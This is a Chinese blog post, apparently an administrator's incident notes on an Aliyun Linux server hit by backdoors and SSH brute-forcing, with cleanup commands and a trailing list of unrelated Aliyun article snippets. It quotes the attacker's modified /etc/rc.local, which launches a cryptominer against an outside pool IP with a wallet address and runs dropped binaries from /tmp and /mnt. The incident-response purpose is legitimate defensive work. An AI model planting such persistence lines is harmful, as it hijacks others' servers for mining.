攻击类型:
主要是后门和肉鸡行为
先解决后门的问题:
步骤
(1)搞清楚后门文件的来历(是如何产生的)
(2)删除后门文件
具体做法:
使用定时器 定期删除后门文件
待删除的文件列表:
(a)/usr/bin/acpid
(b)/usr/bin/bsd-port/agent
定时器要执行的脚本:
定时器:
如何解决肉鸡行为呢?
查看/var/log/secure ,看到确实被多次尝试登陆
[root@iZ25tti3rxdZ log]# cat secure| grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq apache from 121.42.0.30 ftp from 121.42.0.30 invalid user admin invalid user test invalid user user mail from 121.42.0.30 root from 121.42.0.30
发现可疑进程:
如何提高安全性?
我觉得应该有一个机制:
当主机被大量尝试登录时应该增加提醒,比如发邮件或者发短信
查看root的home目录下的.bash_history
终于发现了猫腻:
同时还修改我系统核心文件/etc/rc.local
于是查看/etc/rc.local 的修改记录:
[root@iZ25tti3rxdZ ~]# stat /etc/rc.local
File: `/etc/rc.local'
Size: 390 Blocks: 8 IO Block: 4096 regular file
Device: ca01h/51713dInode: 787612 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2016-01-10 16:34:59.807094407 +0800
Modify: 2015-12-07 11:23:07.160211728 +0800
Change: 2015-12-07 11:23:07.160211728 +0800
说明在2015-12-07 11:23:07被人恶意修改过
再看看修改成啥样了:
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
/tmp/minerd -a scrypt -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk
/mnt/linsx
/mnt/linsx
/mnt/linsx
/mnt/linsx
/tmp/linex
/tmp/linex
/tmp/2897
/tmp/2897
~
正常的:
解决方法:
sed -i 's/^\(.*scrypt\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/mnt\/linsx\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/tmp\/\)/# \1/' /etc/rc.local
异常进程:
[root@iZ25tti3rxdZ ~]# ps -ef |grep "/usr/bin/acpid" |grep -v grep
root 16790 1 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16804 16790 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16805 16804 0 16:48 ? 00:00:00 /usr/bin/acpid
如何杀*死异常进程:
ps -ef |grep "/usr/bin/acpid" |grep -v grep |awk -F" " {'print $2'}|xargs -i kill -9 {} ps -ef |grep "/usr/bin/bsd-port/agent" |grep -v grep |awk -F" " {'print $2'}|xargs -i kill -9 {}
上述代码是在定时器中执行的,每10分钟执行一次
相关推荐
09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云...
阿里云主机发布WordPress网站 WordPress是一种流行的开源内容管理系统(Content Management System,CMS),广泛应用于博客、新闻、商业等网站。为了发布WordPress网站,需要在阿里云主机上安装和配置WordPress...
阿里云虚拟主机操作
3. **高可用性和安全性**:阿里云主机采用硬件冗余设计,具有抵御ARP攻击和MAC欺骗的能力,同时具备强大的抗DDoS攻击能力。其基于大规模的服务器集群,硬件设备全部冗余,大大降低了单点故障的风险。 4. **操作系统...
阿里云主机网站迁移是一项常见的操作,特别是在业务拓展或者优化服务器配置时。以下是对这个过程的详细解释: 1. **提取备份**: 在迁移前,首先需要确保网站数据的安全。登录原有服务器的管理面板,找到“工具...
本篇将详细介绍如何使用Qt编程框架进行远程连接阿里云主机上的MySQL数据库。 首先,要进行远程连接,你需要确保你的阿里云MySQL实例已经开启了公网访问权限。这通常可以在阿里云控制台的数据库实例配置中设置。记得...
* 阿里云安全解决方案提供了多种云安全产品,例如云安全组防火墙、云主机入侵防护、云 WEB 应用防火墙、云数据库防火墙、云安全开发解决方案等。 * 这些产品旨在保护云用户和云服务的安全和隐私,提供了多方面的安全...
简单阿里云主机环境项目搭建。现在很多服务都部署在云服务上,最近项目也要发布到云上,特写此文章。有需要部署云服务的小伙伴可以参考下。
综上所述,这个项目提供了一种使用Go语言结合阿里云ECS监控API来收集和分析ECS主机性能数据的方法。开发人员可以学习如何使用Go语言进行API调用,处理监控数据,以及如何结合Shell脚本来实现定时任务。同时,对于...
在阿里云产品图标大全中,我们还可以看到阿里云的各种解决方案,例如云基础应用、数据存储解决方案、安全解决方案等。这些解决方案为用户提供了全面的云计算能力和应用开发能力。 阿里云产品图标大全是阿里云产品和...
二、阿里云数据中台行业解决方案白皮书 阿里云数据中台-服饰行业消费者个性化服务解决方案 阿里云数据中台-金融行业数据资产管理解决方案 阿里云数据中台-金融行业线上理财业务数字化运营解决方案 阿里云数据中台-...
总之,"阿里云产品图标大全.zip"是一个宝贵的资源库,它包含了阿里云全系列产品的图标,为那些需要在设计和展示中使用阿里云元素的用户提供了一站式的解决方案。无论你是技术专家还是视觉设计师,这个压缩包都将极大...
云上客户对安全投入的驱动力 特定安全事件的产品方案 安全防护的木桶理论 ...云上安全整体解决方案 云上系统等保合规“一站式”解决方案 传统安全体系到云安全体系的转变 混合云态势感知解决方案 云上安全“三字经”
阿里云等级保护2.0解决方案与持续安全运营方案 阿里云-等保合规安全方案报价表; 阿里云安全整体解决方案; 阿里云等保2.0解读视频; 阿里云安全白皮书; 阿里云大数据安全实践; 阿里面向大规模并发实时数仓业务...
信息安全等级保护、阿里云云上等保建设、阿里云等保解决方案、安全运营体系
阿里云安全解决方案介绍
阿里云主机手工安装是指在阿里云主机上手工安装阿里云云监控 Agent 的过程。选择相应的选项进行安装,然后按照安装向导进行操作,即可完成阿里云云监控的部署。 阿里云监控的部署过程相对简单,只需要按照相应的...
阿里云河南授权服务中心提供全面的技术支持和客户服务,包括但不限于电话咨询、在线客服等多种联系方式,帮助企业解决使用过程中遇到的问题,并提供最新的优惠活动信息。 综上所述,阿里云虚拟主机以其低成本、高效...
"4G模块连接阿里云调试" ...规则的基本格式为:阿里云IoT收到4G发送的数据,IOT把收到的数据转发给MQTT的订阅者。 本文详细介绍了如何使用4G模块连接阿里云IoT平台,并使用MQTT.fx工具进行调试和测试。OMUX
通过真实案例,我们可以了解到如何利用阿里云PaaS提升业务效率,解决具体问题,并实现业务的快速迭代。 平台服务部分会深入解析阿里云PaaS的管理控制台和API,让开发者了解如何便捷地使用和管理云资源。讨论内容...